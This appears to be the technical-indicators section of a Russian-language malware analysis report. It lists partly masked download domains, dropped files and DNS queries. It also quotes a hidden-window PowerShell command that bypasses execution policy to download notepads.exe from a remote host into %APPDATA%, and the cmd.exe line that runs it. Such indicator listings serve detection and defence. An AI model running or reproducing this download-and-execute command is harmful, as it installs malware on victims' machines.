Техническая информация
- http://ve###vor-ua.net/bqmimdqy/notepads.exe как %appdata%\notepads.exe
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\notepads.exe
- %TEMP%\dzdtfhgygeghdzВ .sct
- %APPDATA%\notepads.exe
- %TEMP%\dzdtfhgygeghdzВ .sct
- 've###vor-ua.net':80
- 're###armo.com':80
- http://ve###vor-ua.net/bqMiMDqy/notepads.exe
- http://re###armo.com/macfolderfilesloadsonedrivedocumentsuploadsgoogledownloads/Qxuzyrzjekh
- DNS ASK ve###vor-ua.net
- DNS ASK re###armo.com
- '%APPDATA%\notepads.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\notepads.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ve###vor-ua.net/bqMiMDqy/notepads.exe','%APPDATA%\notepads.exe')' (со скрытым окном)